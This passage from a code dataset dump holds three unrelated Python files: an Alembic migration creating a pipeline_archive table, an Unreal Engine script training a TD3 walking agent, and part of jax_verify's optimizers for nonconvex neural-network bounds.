Alembic.\nrevision = 'c789ecdb563c'\ndown_revision = '5e23f85605a5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pipeline_archive',\n sa.Column('pipeline_id', sa.Integer(), nullable=False),\n sa.Column('task_id', sa.Integer(), nullable=False),\n sa.Column('creation_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['pipeline_id'], ['pipelines.id'], ),\n sa.ForeignKeyConstraint(['task_id'], ['tasks.id'], ),\n sa.PrimaryKeyConstraint('pipeline_id', 'task_id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('pipeline_archive')\n ### end Alembic commands ###","sub_path":"alembic/versions/c789ecdb563c_added_pipeline_archive_model.py","file_name":"c789ecdb563c_added_pipeline_archive_model.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32928053","text":"import unreal_engine as ue\n\nimport math\nimport random\nimport torch\nimport gym\nimport numpy as np\nfrom TD3 import TD3\nfrom utils import ReplayBuffer\nimport time\nimport os\nimport copy\nfrom pathlib import Path\nimport threading\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom unreal_engine import FVector, FRotator, FTransform, FHitResult, FLinearColor\nfrom unreal_engine.classes import ActorComponent, ForceFeedbackEffect, KismetSystemLibrary, WidgetBlueprintLibrary\nfrom unreal_engine.enums import EInputEvent, ETraceTypeQuery, EDrawDebugTrace\n\n\n# joint_obs_num = 18\n# state_dim = joint_obs_num\n# state_dim += 2 #pitch/roll\n# state_dim += 1 #ground dist\n# state_dim += 7*6 #ang/lin vel\n# state_dim += 7*6 #pos/rot\n# state_dim += 8 # ground sensors\n# state_dim += 2 # contact sensors\n# state_dim += 1 # target angle - calculated in PY\n#\n#\n# action_dim = 14\n\n#state_dim += action_dim\n\nmax_action = 1.0\n\nmax_power = 60000\ntrace_length = 100 * 40\n\nlog_interval = 60 # print avg reward after interval\ngamma = 0.99 # discount for future rewards\nbatch_size = 128 # num of transitions sampled from replay buffer\nlr = 0.00001\nexploration_noise = 0.4\npolyak = 0.995 # target policy update parameter (1-tau)\npolicy_noise = 0.2 # target policy smoothing noise\nnoise_clip = 0.5\npolicy_delay = 2 # delayed policy updates parameter\nmax_timesteps = 1000 # max timesteps in one episode\n\ndirectory = \"./NNModels/SkelWalker3d\" # save trained models\n#filename = \"TD3_BLIND\"\nloadpol = False\nloadfilename = \"TD3_Skel3dX4\"\nfilename = \"TD3_Skel3dX4\"\n#TD3_BipedalWalker3dComplex2 angdamp = 600\n#TD3_BipedalWalker3dComplex2a angdamp = 100\n#TD3_BipedalWalker3dComplex2b angdamp = 20\n\n\nPath(directory).mkdir(parents=True, exist_ok=True)\n\nprint(os.path.abspath(directory))\n\n\nmaster = None\n\nclass TorchWalkerMaster:\n\n # this is called on game start\n def begin_play(self):\n global master\n self.has_init = False\n master = self\n self.replay_buffer = ReplayBuffer(max_size=200000)\n ue.log('Begin Play on TorchWalkerMaster class')\n ue.log(\"Has CUDA: {}\".format(torch.cuda.is_available()))\n\n\n self.frame = 0\n\n\n self.episode = 0\n self.worker_id = 0\n\n self.writer = SummaryWriter(os.path.join(directory, filename))\n self.can_thread = True\n\n def init_network(self, state_dim, action_dim):\n if not self.has_init:\n print(\"--INITNET---\")\n self.has_init = True\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.policy = TD3(lr, state_dim, action_dim, max_action)\n print(state_dim)\n print(action_dim)\n print(\"--INITNET---\")\n\n if loadpol:\n self.policy.load(directory, loadfilename)\n\n def get_next_ep(self):\n self.episode += 1\n return self.episode\n def get_id(self):\n retid = self.worker_id\n self.worker_id += 1\n return retid\n def write_data(self,ep_reward, ep_reward_avg, ep_frame):\n real_ep = self.episode\n self.writer.add_scalar('ep_reward',\n ep_reward,\n real_ep)\n self.writer.add_scalar('ep_avg_reward',\n ep_reward_avg,\n real_ep)\n self.writer.add_scalar('ep_frame',\n ep_frame,\n real_ep)\n #print(\"finished ep {}, avgscore: {}\".format(real_ep, ep_reward_avg))\n self.episode += 1\n def transfer_buffer(self, buffer):\n self.replay_buffer.mergein(buffer)\n #print(\"buffer merged, length: {}\".format(self.replay_buffer.size))\n\n def thread_func(self):\n if self.replay_buffer.size:\n al, c1l, c2l, prl = self.policy.update(self.replay_buffer, 200, batch_size, gamma, polyak, policy_noise,\n noise_clip, policy_delay)\n print(\"aloss:{}, frame:{}, mem:{}\".format(al, self.frame, self.replay_buffer.size))\n self.writer.add_scalar('actor_loss',\n al,\n self.frame)\n self.writer.add_scalar('c1_loss',\n c1l,\n self.frame)\n self.writer.add_scalar('c2_loss',\n c2l,\n self.frame)\n\n else:\n print(\"skipping\")\n time.sleep(0.01)\n self.can_thread = True\n\n def thread_func_crit(self):\n if self.replay_buffer.size:\n al, c1l, c2l, prl = self.policy.update(self.replay_buffer, 200, batch_size, gamma, polyak, policy_noise,\n noise_clip, policy_delay)\n print(\"aloss:{}, frame:{}, mem:{}\".format(al, self.frame, self.replay_buffer.size))\n self.writer.add_scalar('actor_loss',\n al,\n self.frame)\n self.writer.add_scalar('c1_loss',\n c1l,\n self.frame)\n self.writer.add_scalar('c2_loss',\n c2l,\n self.frame)\n\n else:\n print(\"skipping\")\n time.sleep(0.01)\n self.can_thread = True\n\n def tick(self, delta_time):\n self.frame += 1\n\n if self.replay_buffer.size < 10000:\n # if self.can_thread:\n # x = threading.Thread(target=self.thread_func_crit)#, args=(1,))\n # x.start()\n # self.can_thread = False\n # print(\"buffer size: {}\".format(self.replay_buffer.size))\n return\n\n if self.can_thread:\n x = threading.Thread(target=self.thread_func)#, args=(1,))\n x.start()\n self.can_thread = False\n\n if self.frame % 600 == 0:\n self.policy.save(directory, filename)\n\nclass TorchWalkerMinion:\n\n # this is called on game start\n def begin_play(self):\n self.actor = self.uobject.get_owner()\n self.replay_buffer = ReplayBuffer(max_size=50000)\n ue.log('Begin Play on TorchWalkerMinion class')\n\n #self.policy = TD3(lr, state_dim, action_dim, max_action)\n self.gen_target()\n\n self.last_state = []\n self.last_reward = 0\n self.last_action = None\n self.last_done = False\n self.frame = int(random.random() * 100)\n self.start_pos = self.uobject.get_actor_location()\n\n\n self.episode = 0\n\n self.ep_frame = 0\n self.ep_reward = 0\n self.total_frame = 0\n\n\n self.boredom = 0.8\n\n print(\"MASTER\")\n print(master)\n\n actionlen = self.actor.get_action_dim()\n TEMP_OBS = self.actor.update_observation()[0]\n print(\"TEMP_OBS\")\n print(TEMP_OBS)\n obslen = len(TEMP_OBS)\n print(obslen)\n master.init_network(obslen+1, actionlen)\n\n self.my_id = master.get_id()\n #self.actor.TextRender.call('SetText {}'.format(self.my_id))\n\n self.random_frames = 10\n\n self.bg_thread = None\n\n self.exploration_noise = random.random()*0.3\n self.first_frame = True\n\n\n\n self.policy = master.policy\n\n self.action_space_low = [-1 for x in range(master.action_dim)]\n self.action_space_high = [1 for x in range(master.action_dim)]\n\n\n self.obs_space_low = [-1 for x in range(master.state_dim)]\n self.obs_space_high = [1 for x in range(master.state_dim)]\n\n def gen_target(self):\n target_angle = math.pi*.5# random.random() * math.pi * 2.0\n target_dist = 1000+random.random() * 100 * 1500\n self.target_x = math.cos(target_angle) * target_dist\n self.target_y = math.sin(target_angle) * target_dist\n self.last_dist = self.get_target_dist()\n\n def get_target_angle(self):\n location = self.actor.get_actor_location()\n angle = self.actor.GetTargetAngleFromPos(FVector(self.target_x, self.target_y, location.z))[0]\n nangle = angle / 360 + .5\n return nangle\n\n def get_angle_rads(self):\n angle = self.actor.get_actor_rotation().yaw\n rangle = angle / 180 * math.pi\n return rangle\n\n def get_target_dist(self):\n location = self.actor.get_actor_location()\n xd = location.x - self.target_x\n yd = location.y - self.target_y\n #perhaps check furthest component instead?\n #foreach component:\n #get biggest dstsqr\n #return sqrt(biggest)\n return math.sqrt(xd * xd + yd * yd)\n\n def reset_ep(self):\n #print(\"reset\")\n self.boredom = 0.8\n self.ep_frame = 0\n self.ep_reward = 0\n self.episode += 1\n self.actor.reset_dude()\n #self.actor.ResetPos()\n self.gen_target()\n self.random_frames = random.randint(3,9)\n self.first_frame = True\n\n def tick(self, delta_time):\n self.ep_frame+=1\n self.total_frame += 1\n\n #############get observation#############\n obs = self.actor.update_observation()[0]\n\n target_angle = self.get_target_angle()\n obs.append(target_angle)\n\n state = np.array(obs)\n state = state.clip(self.obs_space_low, self.obs_space_high)\n\n #############get action from policy###############\n if self.total_frame > 0:\n if self.ep_frame < self.random_frames:\n action = np.random.normal(0, exploration_noise*5, size=master.action_dim)\n else:\n action = self.policy.select_action(state)\n action = action + np.random.normal(0, self.exploration_noise, size=master.action_dim)\n action = action.clip(self.action_space_low, self.action_space_high)\n else:\n action = np.random.normal(0, self.exploration_noise*.2, size=master.action_dim)\n\n\n ###############apply action################\n self.actor.set_action(action.tolist())\n\n ########## calc reward ###########\n reward = self.actor.calc_reward()\n\n #reward for keeping joints closer to neutral\n rv = 0\n for jo in self.actor.joint_obs:\n rv += abs(jo-0.5)-.1\n #print(-rv)\n rv *= .01\n reward -= rv\n\n reward -= abs(target_angle)-0.7\n\n\n #getting closer to target\n new_dist = self.get_target_dist()\n diffd = self.last_dist - new_dist\n reward += diffd*.5\n\n self.uobject.draw_debug_line(self.actor.get_actor_location(),\n FVector(self.target_x, self.target_y, self.actor.get_actor_location().z),\n FLinearColor(0, 1, 0),\n 0, 3)\n\n self.last_dist = new_dist\n\n #staying away from ground\n reward += self.actor.ground_dist-.2\n reward += self.actor.head_ground_dist-.2\n\n if random.random()>.9:\n self.actor.action_eval = self.policy.eval_action(state, action)\n\n #timeout, new EP\n done = 0\n if self.ep_frame > max_timesteps:\n done = 1\n\n if self.actor.ground_dist < .045:\n self.actor.hit_body = False\n done = 1\n reward -= 30\n if self.actor.head_ground_dist < .085:\n self.actor.hit_body = False\n done = 1\n reward -= 30\n\n\n # if 1:#self.actor.get_display_name() == \"BipedalWalker3d\":\n # print(\" --- \")\n # print(\" --- \")\n # print(self.replay_buffer.size)\n # print(\" --- \")\n # print(\"joints\")\n # print(-rv)\n # print(\"feet touching\")\n # print(2-self.actor.rfoot_touch-self.actor.lfoot_touch)\n # print(\"ground dist\")\n # print(self.actor.ground_dist-.3)\n # # print(\"balance\")\n # # print((self.actor.body.get_up_vector().z-.4)*.5)\n # print(\"total\")\n # print(reward)\n\n self.ep_reward += reward\n\n self.actor.last_reward = reward\n\n ####### record action ############\n if self.ep_frame > self.random_frames-1:\n self.replay_buffer.add((self.last_state, self.last_action, reward, state, float(done)))\n self.last_state = state\n self.last_action = action\n\n if done:\n ep_reward_avg = self.ep_reward/self.ep_frame\n master.write_data(self.ep_reward, ep_reward_avg, self.ep_frame)\n self.reset_ep()\n master.transfer_buffer(self.replay_buffer)\n self.replay_buffer = ReplayBuffer()\n\n # if new_dist < 500:\n # self.gen_target()\n # self.last_dist = self.get_target_dist()\n # #ue.log(\"NEW TARGET!!!!!\")\n\n self.frame += 1\n self.actor.rfoot_touch = 0\n self.actor.lfoot_touch = 0\n #if self.my_id == 1:\n #print(state)\n\n","sub_path":"Content/Scripts/SwarmSkeleton.py","file_name":"SwarmSkeleton.py","file_ext":"py","file_size_in_byte":12993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558495128","text":"# coding=utf-8\n# Copyright 2021 The jax_verify Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Provides optimizers to use with the NonConvexBound in `nonconvex.py`.\n\"\"\"\n\nimport abc\nimport math\nfrom typing import Tuple, Callable, Dict, Optional, List\n\nimport jax\nimport jax.numpy as jnp\n\nfrom jax_verify.src import bound_propagation\nfrom jax_verify.src import ibp\nfrom jax_verify.src import utils\nfrom jax_verify.src.nonconvex import nonconvex\nimport numpy as np\nimport optax\n\n\nTensor = jnp.ndarray\nIndex = bound_propagation.Index\nParamSet = nonconvex.ParamSet\nBranchPlane = Tuple[Index, int, float]\nBranchConstraint = Tuple[BranchPlane, int]\n\n\nclass BoundOptimizer(metaclass=abc.ABCMeta):\n \"\"\"Abstract Class to define the API of optimizer.\n\n Each subclass defines an optimization algorithm to solve the optimization\n problem defined by a NonConvexBound. This is done by overloading the\n `optimize` function.\n \"\"\"\n\n @abc.abstractmethod\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound\n ) -> Callable[[ParamSet, ParamSet], ParamSet]:\n pass\n\n\nclass OptimizingConcretizer(nonconvex.Concretizer):\n \"\"\"Concretizer based on optimizing the intermediate bounds.\n\n This needs to be initialized with an optimizer, and concrete bounds will be\n obtained by solving the relaxation for the intermediate activations.\n \"\"\"\n\n def __init__(\n self, optimizer: BoundOptimizer,\n max_parallel_nodes: int = 512,\n branching_constraints: Optional[List[BranchConstraint]] = None,\n branching_optimizer: Optional[optax.GradientTransformation] = None,\n branching_opt_number_steps: int = 0):\n self._optimizer = optimizer\n self._max_parallel_nodes = max_parallel_nodes\n self._branching_constraints = []\n self._branching_optimizer = None\n self._branching_opt_number_steps = branching_opt_number_steps\n\n if branching_constraints is not None:\n self._branching_constraints = branching_constraints\n # Keep the optimizer for the branching constraints dual variables.\n if (branching_optimizer is None) or (branching_opt_number_steps == 0):\n raise ValueError('If branching constraints are imposed, an optimizer '\n 'and a number of optimization steps for the lagrangian'\n ' variables corresponding to them needs to be '\n 'provided.')\n self._branching_optimizer = branching_optimizer\n self._branching_opt_number_steps = branching_opt_number_steps\n\n def accept_input(self, *_args, **_kwargs):\n # There is no need to update anything.\n pass\n\n def accept_primitive(self, *_args, **_kwargs):\n # For now, the optimizer is not dependent on what propagation has been\n # achieved, so just reuse the same.\n # Potentially, in the future, we could handle adapting the hyperparameters.\n pass\n\n def get_bounds(self, to_opt_bound: nonconvex.NonConvexBound\n ) -> bound_propagation.Bound:\n optimize_fun = self._optimizer.optimize_fun(to_opt_bound)\n\n def optimize_chunk(chunk_index: int) -> Tuple[Tensor, Tensor]:\n var_shapes, chunk_objectives = _create_opt_problems(\n to_opt_bound, chunk_index, self._max_parallel_nodes)\n\n ini_var_set = {key: 0.5 * jnp.ones(shape)\n for key, shape in var_shapes.items()}\n\n def solve_problem(objectives: ParamSet) -> Tensor:\n # Optimize the bound for primal variables.\n opt_var_set = optimize_fun(objectives, ini_var_set)\n # Compute the resulting bound\n _, bound_vals = to_opt_bound.dual(jax.lax.stop_gradient(opt_var_set),\n objectives)\n return bound_vals\n\n if any(node_idx <= to_opt_bound.index\n for ((node_idx, *_), _) in self._branching_constraints):\n # There exists constraints that needs to be taken into account.\n\n # The dual vars per constraint are scalars, but we need to apply them\n # for each of the optimization objective.\n nb_targets = chunk_objectives[to_opt_bound.index].shape[0]\n # Create the dual variables for them.\n active_branching_constraints = [\n (node_idx, neuron_idx, val, side)\n for (node_idx, neuron_idx, val), side in self._branching_constraints\n if node_idx <= to_opt_bound.index\n ]\n nb_constraints = len(active_branching_constraints)\n dual_vars = [jnp.zeros([nb_targets])] * nb_constraints\n\n # Define the objective function to optimize. The branching constraints\n # are lifted into the objective function.\n def unbranched_objective(dual_vars: ParamSet) -> Tuple[float, Tensor]:\n objectives = chunk_objectives.copy()\n base_term = jnp.zeros([nb_targets])\n for ((node_idx, neuron_idx, val, side),\n branch_dvar) in zip(active_branching_constraints, dual_vars):\n # Adjust the objective function to incorporate the dual variables.\n if node_idx not in objectives:\n objectives[node_idx] = jnp.zeros(var_shapes[node_idx])\n\n # The branching constraint is encoded as:\n # side * neuron >= side * val\n # (when side==1, this is neuron >= lb,\n # and when side==-1, this is -neuron >= -ub )\n # To put in a canonical form \\lambda_b() <= 0, this is:\n # \\lambda_b() = side * val - side * neuron\n\n # Lifting the branching constraints takes us from the problem:\n # min_{z} f(z)\n # s.t. \\mu_i() <= z_i <= \\eta_i() \\forall i\n # \\lambda_b() <= 0 \\forall b\n #\n # to\n # max_{\\rho_b} min_{z} f(z) + \\rho_b \\lambda_b()\n # s.t \\mu_i() <= z_i <= \\eta_i() \\forall i\n # s.t rho_b >= 0\n\n # Add the term corresponding to the dual variables to the linear\n # objective function.\n coeff_to_add = -side * branch_dvar\n index_to_update = jax.ops.index[:, neuron_idx]\n flat_node_obj = jnp.reshape(objectives[node_idx], (nb_targets, -1))\n flat_updated_node_obj = jax.ops.index_add(flat_node_obj,\n index_to_update,\n coeff_to_add)\n updated_node_obj = jnp.reshape(flat_updated_node_obj,\n var_shapes[node_idx])\n objectives[node_idx] = updated_node_obj\n\n # Don't forget the terms based on the bound.\n base_term = base_term + (side * val * branch_dvar)\n\n network_term = solve_problem(objectives)\n bound = network_term + base_term\n\n return bound.sum(), bound\n\n def evaluate_bound(ini_dual_vars: List[Tensor]) -> Tensor:\n ini_state = self._branching_optimizer.init(ini_dual_vars)\n eval_and_grad_fun = jax.grad(unbranched_objective, argnums=0,\n has_aux=True)\n\n # The carry consists of:\n # - The best set of dual variables seen so far.\n # - The current set of dual variables.\n # - The best bound obtained so far.\n # - The state of the optimizer.\n # For each of the step, we will:\n # - Evaluate the bounds by the current set of dual variables.\n # - Update the best set of dual variables if progress was achieved.\n # - Do an optimization step on the current set of dual variables.\n # This way, we are guaranteed that we keep track of the dual variables\n # producing the best bound at the end.\n def opt_step(\n carry: Tuple[List[Tensor], List[Tensor],\n Tensor, optax.OptState], _\n ) -> Tuple[Tuple[List[Tensor], List[Tensor],\n Tensor, optax.OptState], None]:\n best_lagdual, lagdual, best_bound, state = carry\n # Compute the bound and their gradients.\n lagdual_grads, new_bound = eval_and_grad_fun(lagdual)\n\n # Update the lagrangian dual variables for the best bound seen.\n improve_best = new_bound > best_bound\n new_best_lagdual = []\n for best_dvar, new_dvar in zip(best_lagdual, lagdual):\n new_best_lagdual.append(jnp.where(improve_best,\n new_dvar, best_dvar))\n # Update the best bound seen\n new_best_bound = jnp.maximum(best_bound, new_bound)\n\n # Perform optimization step\n updates, new_state = self._branching_optimizer.update(\n lagdual_grads, state, lagdual)\n unc_dual = optax.apply_updates(lagdual, updates)\n new_lagdual = jax.tree_map(lambda x: jnp.maximum(x, 0.), unc_dual)\n return ((new_best_lagdual, new_lagdual, new_best_bound, new_state),\n None)\n\n dummy_bound = -float('inf')*jnp.ones([nb_targets])\n initial_carry = (ini_dual_vars, ini_dual_vars, dummy_bound, ini_state)\n\n (best_lagdual, *_), _ = jax.lax.scan(\n opt_step, initial_carry, None,\n length=self._branching_opt_number_steps)\n\n _, bound_vals = unbranched_objective(\n jax.lax.stop_gradient(best_lagdual))\n\n return bound_vals\n\n bound_vals = evaluate_bound(dual_vars)\n else:\n bound_vals = solve_problem(chunk_objectives)\n\n chunk_lbs, chunk_ubs = _unpack_opt_problem(bound_vals)\n return chunk_lbs, chunk_ubs\n\n return _chunked_optimization(to_opt_bound.shape,\n self._max_parallel_nodes,\n optimize_chunk)\n\n\ndef _chunked_optimization(\n bound_shape: Tuple[int, ...],\n max_parallel_nodes: int,\n optimize_chunk: Callable[[int], Tuple[Tensor, Tensor]],\n) -> ibp.IntervalBound:\n \"\"\"Perform optimization of the target in chunks.\n\n Args:\n bound_shape: Shape of the bound to compute\n max_parallel_nodes: How many activations to optimize at once. If =0, perform\n optimize all the nodes simultaneously.\n optimize_chunk: Function to optimize a chunk and return updated bounds.\n Returns:\n bounds: Optimized bounds.\n \"\"\"\n nb_opt = int(np.prod(bound_shape))\n if (max_parallel_nodes == 0) or (nb_opt <= max_parallel_nodes):\n flat_lbs, flat_ubs = optimize_chunk(0)\n else:\n nb_opt_chunk = math.ceil(nb_opt / max_parallel_nodes)\n chunk_indices = jnp.arange(nb_opt_chunk)\n (map_lbs, map_ubs) = jax.lax.map(optimize_chunk, chunk_indices)\n # Remove the padding elements\n flat_lbs = jnp.reshape(map_lbs, (-1,))[:nb_opt]\n flat_ubs = jnp.reshape(map_ubs, (-1,))[:nb_opt]\n lbs = jnp.reshape(flat_lbs, bound_shape)\n ubs = jnp.reshape(flat_ubs, bound_shape)\n bounds = ibp.IntervalBound(lbs, ubs)\n return bounds\n\n\ndef _create_opt_problems(\n non_convex_bound: nonconvex.NonConvexBound,\n chunk_index: int,\n nb_parallel_nodes: int,\n) -> Tuple[Dict[Index, Tuple[int, ...]], ParamSet]:\n \"\"\"Define the objective function and the necessary variables shape.\n\n Iteratively yields the objectives to minimize in order to limit memory usage.\n\n Args:\n non_convex_bound: Bound for which to create the optimization problems.\n chunk_index: Index of the optimization chunk to generate.\n nb_parallel_nodes: How large should the optimization chunks be. If 0,\n optimize all problems at once.\n Returns:\n var_to_opt: shapes of the variables to optimize to compute the bounds.\n objectives_by_layer: Objectives to minimize, in the form of a dictionary\n mapping the position of activations to the linear coefficients of the\n objective function.\n \"\"\"\n # Create the objective matrix\n lb_obj = utils.objective_chunk(\n non_convex_bound.shape, chunk_index, nb_parallel_nodes)\n # Get the objective for the upper bounds.\n ub_obj = -lb_obj\n obj = jnp.concatenate([lb_obj, ub_obj], axis=0)\n\n # Generate the shape of the variables necessary to solve the problem\n var_to_opt = {}\n for pos, var_shape in non_convex_bound.variables.items():\n var_to_opt[pos] = (obj.shape[0],) + var_shape\n\n objectives_by_layer = {non_convex_bound.index: obj}\n return var_to_opt, objectives_by_layer\n\n\ndef _unpack_opt_problem(dual_vals: Tensor) -> Tuple[Tensor, Tensor]:\n \"\"\"Extract the lower bounds and upper bounds from the result of optmization.\n\n Args:\n dual_vals: Value of the dual returned by the optimization process.\n Returns:\n lb: Tensor containing lower bounds were they were computed and 0 elsewhere.\n ub: Tensor containing upper bounds were they were computed and 0 elsewhere.\n \"\"\"\n lb_duals, ub_duals = jnp.split(dual_vals, 2, axis=0)\n\n return lb_duals, -ub_duals\n\n\ndef _pgd_step(current: ParamSet,\n grad: ParamSet,\n step_size: Tensor) -> ParamSet:\n \"\"\"Do a projected gradient step with the given step size.\"\"\"\n new_varset = {}\n for key, var in current.items():\n var_grad = grad[key]\n nb_act_dims = len(var.shape) - len(step_size.shape)\n broad_step_size = jnp.reshape(step_size,\n step_size.shape + (1,)*nb_act_dims)\n new_varset[key] = jnp.clip(var + broad_step_size * var_grad, 0., 1.)\n return new_varset\n\n\nclass LinesearchFistaOptimizer(BoundOptimizer):\n \"\"\"FISTA with line search.\n\n As done in the \"An efficient nonconvex reformulation of stagewise convex\n optimization problems\" NeurIPS2020 submission. This is a reimplementation\n of the code at:\n l/d/r/r_v/verification/ibp/verification/nonconvex_optimizable_bounds.py\n\n The difference between the two versions of the code is that this\n implementation performs minimization while the other one performed\n maximization. This difference is visible in the following places:\n - Changes the formula of the quadratic approximation (sign before\n the L2 norm term).\n - Direction of the comparison for the line search.\n - Direction of the step.\n - Direction of the dual gap (when minimizing, it is primal - dual, while\n it is dual - primal when maximizing) to check for convergence.\n \"\"\"\n\n def __init__(self,\n num_steps: int,\n max_step_size: float = 100.0,\n min_step_size: float = 1e-5,\n beta_l: float = 0.5,\n beta_h: float = 1.5,\n check_convergence_every: int = 1,\n check_relative_dual_gap: bool = False,\n termination_dual_gap: float = 1e-2):\n self._num_steps = num_steps\n self._max_step_size = max_step_size\n self._min_step_size = min_step_size\n self._beta_l = beta_l\n self._beta_h = beta_h\n self._check_convergence_every = check_convergence_every\n self._check_relative_dual_gap = check_relative_dual_gap\n self._termination_dual_gap = termination_dual_gap\n\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound\n )->Callable[[ParamSet, ParamSet], ParamSet]:\n \"\"\"Returns a function optimizing the primal variables.\n\n Args:\n non_convex_bound: NonConvex object to define the objective function over\n Returns:\n optimize: Optimization function.\n \"\"\"\n ## Define the functions for the backtracking line search\n # We have a separate optimization per optimization target (so one per batch\n # element times per neuron).\n # This will be performed in jax.lax.while_loop, with the following arguments\n # ls_loop_args:\n # need_lower: Boolean array indicating for each step_size if we still\n # needs to lower the step size.\n # step_size: Array of step size being used.\n # y_stats: Tuple with y, f(y) and grad(y), so that we don't have to keep\n # recomputing it.\n # objectives: Coefficients of the objective functions.\n def quad_approx(x: ParamSet,\n y: ParamSet,\n grad_y: ParamSet,\n step_size: Tensor) -> Tensor:\n quad_approx = 0\n for key, x_var in x.items():\n y_var = y[key]\n grady_var = grad_y[key]\n dims_to_reduce = tuple(range(1, y_var.ndim))\n quad_approx = quad_approx + (\n ((x_var - y_var)*grady_var).sum(axis=dims_to_reduce)\n + 0.5 / step_size * ((x_var - y_var)**2).sum(axis=dims_to_reduce))\n return quad_approx\n\n def should_decrease(step_size: Tensor,\n y_stats: Tuple[ParamSet, Tensor, ParamSet],\n objectives: ParamSet) -> Tensor:\n y, f_y, grad_y = y_stats\n new_x = _pgd_step(y, grad_y, -step_size)\n val_newx, _ = non_convex_bound.primal_fn(new_x, objectives)\n val_qapprox = f_y + quad_approx(new_x, y, grad_y, step_size)\n per_sp_insufficient_progress = (val_newx >= val_qapprox)\n step_size_not_min = step_size > self._min_step_size\n return jnp.logical_and(step_size_not_min, per_sp_insufficient_progress)\n\n def lower_stepsize_if_needed(\n ls_loop_args:\n Tuple[Tensor, Tensor, Tuple[ParamSet, Tensor, ParamSet], ParamSet],\n ) -> Tuple[Tensor, Tensor, Tuple[ParamSet, Tensor, ParamSet], ParamSet]:\n \"\"\"Reduce the step size for all the optimization target that need it.\n\n Update the check to see if it needs to be reduced further.\n\n Args:\n ls_loop_args: Line search loop arguments\n Returns:\n new_ls_loop_args: Updated line search loop arguments\n \"\"\"\n need_lower, step_size, y_stats, objectives = ls_loop_args\n new_step_size = jnp.where(need_lower,\n self._beta_l * step_size, step_size)\n new_need_lower = should_decrease(new_step_size, y_stats, objectives)\n return (new_need_lower, new_step_size, y_stats, objectives)\n\n any_need_lower_stepsize = lambda ls_loop_args: ls_loop_args[0].any()\n\n ## Define the function for the optimization loop\n # Perform the Fista with backtracking line search algorithm, as described\n # in \"A Fast Iterative Shrinkage-Thresholding Algorithm\", Beck and Teboulle\n # The only change is that we increase the step size by a factor of\n # self._beta_h for step size that didn't need to be reduced at all during\n # the linesearch.\n # This is performed in a jax.lax.while_loop, with the following arguments:\n # opt_loop_args:\n # it: Iteration counter\n # x, y: variable set\n # gamma: float, coefficient used for the momentum (t_k in the paper)\n # step_size: Array containing the current values of the step size.\n # objectives: Coefficients of the objective functions.\n # We stop either based on a maximum number of iterations, or based on the\n # convergence between the primal objective and the dual objective, which is\n # checked every self._check_convergence_every iterations.\n def fista_with_linesearch_step(\n opt_loop_args: Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet],\n ) -> Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet]:\n it, x, y, gamma, step_size, objectives = opt_loop_args\n # Compute f_y and d(f_y)/d(y)\n value_and_gradofsum_fn = jax.value_and_grad(non_convex_bound.primal_sumfn,\n has_aux=True)\n (_, (f_y, _)), grad_y = value_and_gradofsum_fn(y, objectives)\n\n # Compute the step size to use with a line search\n y_stats = (y, f_y, grad_y)\n ini_need_lower = should_decrease(step_size, y_stats, objectives)\n _, new_step_size, _, _ = jax.lax.while_loop(\n any_need_lower_stepsize,\n lower_stepsize_if_needed,\n (ini_need_lower, step_size, y_stats, objectives))\n\n # Perform the updates\n new_x = _pgd_step(y, grad_y, -new_step_size)\n new_gamma = 1 + jnp.sqrt(1 + gamma ** 2) / 2\n coeff = (gamma - 1) / new_gamma\n\n new_y = {}\n for key, new_x_var in new_x.items():\n new_y[key] = new_x_var + coeff * (new_x_var - x[key])\n\n # Increase the step size of the samples that didn't need reducing.\n new_step_size = jnp.where(ini_need_lower,\n new_step_size, self._beta_h * new_step_size)\n\n return it + 1, new_x, new_y, new_gamma, new_step_size, objectives\n\n def not_all_converged(not_converged_args: Tuple[ParamSet, ParamSet],\n ) -> bool:\n x, objectives = not_converged_args\n primal, dual = non_convex_bound.dual(x, objectives)\n dgap_value = primal - dual\n if self._check_relative_dual_gap:\n bound_scale = 0.5 * (jnp.abs(primal) + jnp.abs(dual))\n termination_gap = (1 + bound_scale) * self._termination_dual_gap\n else:\n termination_gap = self._termination_dual_gap\n\n return (dgap_value > termination_gap).any()\n\n def continue_criterion(\n opt_loop_args: Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet],\n ) -> Tensor:\n it, x, *_, objectives = opt_loop_args\n not_all_iterations = (it < self._num_steps)\n opt_not_converged = jax.lax.cond(\n (it % self._check_convergence_every) == 0.,\n not_all_converged,\n lambda _: jnp.array(True),\n operand=(x, objectives))\n return jnp.logical_and(opt_not_converged, not_all_iterations)\n\n ## Define the function to optimize a chunk of the nodes of the activation.\n def optimize(objectives: ParamSet, x: ParamSet) -> ParamSet:\n y = x\n target_dims = objectives[non_convex_bound.index].shape[0]\n gamma = jnp.array(0.)\n step_size = self._max_step_size * jnp.ones(target_dims)\n it = jnp.array(0)\n\n _, final_x, _, _, _, _ = jax.lax.while_loop(\n continue_criterion,\n fista_with_linesearch_step,\n (it, x, y, gamma, step_size, objectives))\n\n return final_x\n\n return optimize\n\n\nclass PGDOptimizer(BoundOptimizer):\n \"\"\"Projected Gradient Optimizer.\n\n Optimization can either by taking gradients with respect to the primal or the\n dual objective.\n\n Passing a number of steps equal to zero will result in the bound derived from\n the initialization.\n \"\"\"\n\n def __init__(self, num_steps: int, step_size: float,\n optimize_dual: bool = False):\n self._num_steps 